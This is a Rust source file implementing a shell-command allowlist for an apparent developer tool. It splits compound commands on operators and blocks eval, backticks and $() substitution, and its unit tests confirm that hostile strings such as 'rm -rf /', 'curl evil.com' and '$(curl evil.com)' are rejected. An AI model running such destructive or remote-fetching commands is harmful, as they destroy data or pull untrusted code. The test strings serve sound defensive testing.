Skip to main content

lean_ctx/core/
shell_allowlist.rs

1//! Shell allowlist with AST-based command parsing.
2//!
3//! Security model (Information Bottleneck principle):
4//! - When allowlist is set: ALL segments of a compound command must be allowed (deny-by-default)
5//! - When empty: all commands pass (backwards-compatible blocklist-only mode)
6//! - Dangerous patterns (subshells, eval, backticks) are blocked in restricted mode
7
8/// Checks if a command is allowed by the shell allowlist.
9/// Returns `Ok(())` if allowed, `Err(message)` if blocked.
10///
11/// When the allowlist is empty, all commands pass (blocklist-only mode).
12/// When non-empty, EVERY command segment in the pipeline must match.
13pub fn check_shell_allowlist(command: &str) -> Result<(), String> {
14    let allowlist = effective_allowlist();
15    if allowlist.is_empty() {
16        return Ok(());
17    }
18    check_all_segments(command, &allowlist)
19}
20
21fn check_all_segments(command: &str, allowlist: &[String]) -> Result<(), String> {
22    if allowlist.is_empty() {
23        return Ok(());
24    }
25
26    if has_dangerous_patterns(command) {
27        return Err(format!(
28            "[SHELL ALLOWLIST] Command contains dangerous patterns (eval, backticks, or $(...) substitution) \
29             which are blocked in restricted mode: {command}"
30        ));
31    }
32
33    let segments = extract_all_commands(command);
34    if segments.is_empty() {
35        return Err("[SHELL ALLOWLIST] Empty command".to_string());
36    }
37
38    for seg in &segments {
39        let base = extract_base_from_segment(seg);
40        if base.is_empty() {
41            continue;
42        }
43        if !allowlist.iter().any(|a| a == &base) {
44            return Err(format!(
45                "[SHELL ALLOWLIST] Command segment '{seg}' (base: '{base}') is not allowed. \
46                 All segments must be in the allowlist. Allowed: {}",
47                allowlist.join(", ")
48            ));
49        }
50    }
51    Ok(())
52}
53
54/// Detect dangerous shell patterns that bypass allowlist intent.
55fn has_dangerous_patterns(command: &str) -> bool {
56    let trimmed = command.trim();
57
58    // eval invocation
59    if trimmed.starts_with("eval ") || trimmed.contains("; eval ") || trimmed.contains("&& eval ") {
60        return true;
61    }
62
63    // Backtick command substitution
64    if trimmed.contains('`') {
65        return true;
66    }
67
68    // $() command substitution used as a command (not just in arguments)
69    // We block $() at command position, not inside quoted strings for args
70    if has_command_substitution_at_command_pos(trimmed) {
71        return true;
72    }
73
74    false
75}
76
77/// Check if $() appears in a dangerous position (as a command or in a segment
78/// where it could be used to bypass the allowlist).
79fn has_command_substitution_at_command_pos(command: &str) -> bool {
80    let segments = split_on_operators(command);
81    for seg in segments {
82        let trimmed = seg.trim();
83        // Skip env var assignments to find the actual command
84        let cmd_start = skip_env_assignments(trimmed);
85        // $() at command position (start of segment)
86        if cmd_start.starts_with("$(") {
87            return true;
88        }
89        // $() anywhere in a segment that would execute arbitrary code
90        // We block $() in all segments when in restricted mode
91        if cmd_start.contains("$(") {
92            return true;
93        }
94    }
95    false
96}
97
98/// Extract ALL command segments from a compound shell command.
99/// Splits on: &&, ||, ;, | (pipe), and handles subshell grouping.
100fn extract_all_commands(command: &str) -> Vec<String> {
101    split_on_operators(command)
102        .into_iter()
103        .map(|s| s.trim().to_string())
104        .filter(|s| !s.is_empty())
105        .collect()
106}
107
108/// Split command string on shell operators: ;, &&, ||, |
109/// Respects single/double quotes and parentheses nesting.
110fn split_on_operators(command: &str) -> Vec<&str> {
111    let mut segments = Vec::new();
112    let mut start = 0;
113    let bytes = command.as_bytes();
114    let len = bytes.len();
115    let mut i = 0;
116    let mut in_single_quote = false;
117    let mut in_double_quote = false;
118    let mut paren_depth: u32 = 0;
119
120    while i < len {
121        let ch = bytes[i];
122
123        if in_single_quote {
124            if ch == b'\'' {
125                in_single_quote = false;
126            }
127            i += 1;
128            continue;
129        }
130
131        if in_double_quote {
132            if ch == b'"' && (i == 0 || bytes[i - 1] != b'\\') {
133                in_double_quote = false;
134            }
135            i += 1;
136            continue;
137        }
138
139        match ch {
140            b'\'' => {
141                in_single_quote = true;
142                i += 1;
143            }
144            b'"' => {
145                in_double_quote = true;
146                i += 1;
147            }
148            b'(' => {
149                paren_depth += 1;
150                i += 1;
151            }
152            b')' => {
153                paren_depth = paren_depth.saturating_sub(1);
154                i += 1;
155            }
156            b';' if paren_depth == 0 => {
157                segments.push(&command[start..i]);
158                i += 1;
159                start = i;
160            }
161            b'&' if paren_depth == 0 && i + 1 < len && bytes[i + 1] == b'&' => {
162                segments.push(&command[start..i]);
163                i += 2;
164                start = i;
165            }
166            b'|' if paren_depth == 0 => {
167                if i + 1 < len && bytes[i + 1] == b'|' {
168                    // ||
169                    segments.push(&command[start..i]);
170                    i += 2;
171                    start = i;
172                } else {
173                    // pipe
174                    segments.push(&command[start..i]);
175                    i += 1;
176                    start = i;
177                }
178            }
179            _ => {
180                i += 1;
181            }
182        }
183    }
184
185    if start < len {
186        segments.push(&command[start..]);
187    }
188
189    segments
190}
191
192/// Extract the base command name from a single segment (no operators).
193fn extract_base_from_segment(segment: &str) -> String {
194    let trimmed = segment.trim();
195    if trimmed.is_empty() {
196        return String::new();
197    }
198
199    let cmd_part = skip_env_assignments(trimmed);
200    if cmd_part.is_empty() {
201        return String::new();
202    }
203
204    // Take first whitespace-delimited token as the command
205    let first_token = cmd_part.split_whitespace().next().unwrap_or("");
206
207    // Strip path prefix: /usr/bin/git -> git
208    first_token
209        .rsplit('/')
210        .next()
211        .unwrap_or(first_token)
212        .to_string()
213}
214
215/// Skip leading KEY=VALUE environment variable assignments.
216fn skip_env_assignments(segment: &str) -> &str {
217    let mut rest = segment;
218    loop {
219        let token = rest.split_whitespace().next().unwrap_or("");
220        if token.is_empty() {
221            return rest;
222        }
223        // env var assignment: contains '=' and doesn't start with '-' or '/'
224        if token.contains('=')
225            && !token.starts_with('-')
226            && !token.starts_with('/')
227            && !token.starts_with('.')
228        {
229            // Advance past this token
230            let after = &rest[rest.find(token).unwrap_or(0) + token.len()..];
231            rest = after.trim_start();
232        } else {
233            return rest;
234        }
235    }
236}
237
238fn effective_allowlist() -> Vec<String> {
239    if let Ok(env_val) = std::env::var("LEAN_CTX_SHELL_ALLOWLIST") {
240        return env_val
241            .split(',')
242            .map(|s| s.trim().to_string())
243            .filter(|s| !s.is_empty())
244            .collect();
245    }
246    crate::core::config::Config::load().shell_allowlist
247}
248
249// Legacy compat: single-segment extraction (used by other callers)
250pub fn extract_base_command(command: &str) -> String {
251    let first_seg = split_on_operators(command)
252        .into_iter()
253        .next()
254        .unwrap_or(command);
255    extract_base_from_segment(first_seg)
256}
257
258#[cfg(test)]
259mod tests {
260    use super::*;
261
262    // --- extract_base_command tests (legacy compat) ---
263
264    #[test]
265    fn extract_simple_command() {
266        assert_eq!(extract_base_command("git status"), "git");
267    }
268
269    #[test]
270    fn extract_with_path() {
271        assert_eq!(extract_base_command("/usr/bin/git log"), "git");
272    }
273
274    #[test]
275    fn extract_with_env_assignment() {
276        assert_eq!(extract_base_command("LANG=en_US git log"), "git");
277    }
278
279    #[test]
280    fn extract_chained_commands() {
281        assert_eq!(extract_base_command("cd /tmp && ls -la"), "cd");
282    }
283
284    #[test]
285    fn extract_piped_command() {
286        assert_eq!(extract_base_command("grep foo | wc -l"), "grep");
287    }
288
289    #[test]
290    fn extract_semicolon_chain() {
291        assert_eq!(extract_base_command("echo hello; rm -rf /"), "echo");
292    }
293
294    #[test]
295    fn extract_empty_command() {
296        assert_eq!(extract_base_command(""), "");
297    }
298
299    #[test]
300    fn extract_whitespace_only() {
301        assert_eq!(extract_base_command("   "), "");
302    }
303
304    #[test]
305    fn extract_multiple_env_vars() {
306        assert_eq!(extract_base_command("FOO=bar BAZ=qux cargo test"), "cargo");
307    }
308
309    // --- All-segments validation tests ---
310
311    fn allow(cmds: &[&str]) -> Vec<String> {
312        cmds.iter().map(std::string::ToString::to_string).collect()
313    }
314
315    #[test]
316    fn allowlist_empty_always_passes() {
317        assert!(check_all_segments("anything", &[]).is_ok());
318    }
319
320    #[test]
321    fn allowlist_blocks_unlisted() {
322        let list = allow(&["git", "cargo"]);
323        let result = check_all_segments("npm install", &list);
324        assert!(result.is_err());
325        assert!(result.unwrap_err().contains("npm"));
326    }
327
328    #[test]
329    fn allowlist_allows_listed() {
330        let list = allow(&["git", "cargo", "npm"]);
331        assert!(check_all_segments("git status", &list).is_ok());
332        assert!(check_all_segments("cargo test --release", &list).is_ok());
333        assert!(check_all_segments("npm run build", &list).is_ok());
334    }
335
336    #[test]
337    fn allowlist_allows_full_path() {
338        let list = allow(&["git"]);
339        assert!(check_all_segments("/usr/bin/git status", &list).is_ok());
340    }
341
342    #[test]
343    fn allowlist_allows_with_env_prefix() {
344        let list = allow(&["git"]);
345        assert!(check_all_segments("LANG=C git log", &list).is_ok());
346    }
347
348    #[test]
349    fn allowlist_blocks_similar_names() {
350        let list = allow(&["git"]);
351        assert!(check_all_segments("gitk --all", &list).is_err());
352    }
353
354    // --- Multi-segment validation (the critical security improvement) ---
355
356    #[test]
357    fn all_segments_must_be_allowed_chain() {
358        let list = allow(&["git", "cargo"]);
359        // Both allowed → ok
360        assert!(check_all_segments("git status && cargo test", &list).is_ok());
361        // Second not allowed → block
362        assert!(check_all_segments("git status && rm -rf /", &list).is_err());
363    }
364
365    #[test]
366    fn all_segments_must_be_allowed_pipe() {
367        let list = allow(&["git", "grep", "wc"]);
368        assert!(check_all_segments("git log | grep fix | wc -l", &list).is_ok());
369        // cat not allowed
370        assert!(check_all_segments("git log | cat", &list).is_err());
371    }
372
373    #[test]
374    fn all_segments_must_be_allowed_semicolon() {
375        let list = allow(&["echo", "ls"]);
376        assert!(check_all_segments("echo hello; ls -la", &list).is_ok());
377        assert!(check_all_segments("echo hello; rm -rf /", &list).is_err());
378    }
379
380    #[test]
381    fn all_segments_must_be_allowed_or() {
382        let list = allow(&["git", "echo"]);
383        assert!(check_all_segments("git pull || echo failed", &list).is_ok());
384        assert!(check_all_segments("git pull || curl evil.com", &list).is_err());
385    }
386
387    // --- Dangerous pattern detection ---
388
389    #[test]
390    fn blocks_eval() {
391        let list = allow(&["echo", "eval"]);
392        // Even if 'eval' is in allowlist, the pattern is blocked
393        assert!(check_all_segments("eval 'rm -rf /'", &list).is_err());
394    }
395
396    #[test]
397    fn blocks_backticks() {
398        let list = allow(&["echo"]);
399        assert!(check_all_segments("echo `whoami`", &list).is_err());
400    }
401
402    #[test]
403    fn blocks_command_substitution_at_command_pos() {
404        let list = allow(&["echo"]);
405        assert!(check_all_segments("$(curl evil.com)", &list).is_err());
406    }
407
408    #[test]
409    fn blocks_dollar_paren_in_all_positions() {
410        // In restricted mode (allowlist set), $() is blocked everywhere
411        // because it can execute arbitrary code regardless of position
412        let list = allow(&["echo"]);
413        assert!(check_all_segments("echo $(whoami)", &list).is_err());
414        // But normal commands without $() work fine
415        assert!(check_all_segments("echo hello", &list).is_ok());
416    }
417
418    // --- Quote handling ---
419
420    #[test]
421    fn respects_single_quotes() {
422        let list = allow(&["echo"]);
423        // The semicolon is inside quotes, so it's one segment
424        assert!(check_all_segments("echo 'hello; world'", &list).is_ok());
425    }
426
427    #[test]
428    fn respects_double_quotes() {
429        let list = allow(&["echo"]);
430        assert!(check_all_segments("echo \"hello && world\"", &list).is_ok());
431    }
432
433    // --- split_on_operators ---
434
435    #[test]
436    fn split_simple_pipe() {
437        let parts = split_on_operators("a | b");
438        assert_eq!(parts, vec!["a ", " b"]);
439    }
440
441    #[test]
442    fn split_complex_chain() {
443        let parts = split_on_operators("a && b || c; d | e");
444        assert_eq!(parts.len(), 5);
445    }
446
447    #[test]
448    fn split_preserves_quoted_operators() {
449        let parts = split_on_operators("echo 'a && b' | grep x");
450        assert_eq!(parts.len(), 2);
451    }
452}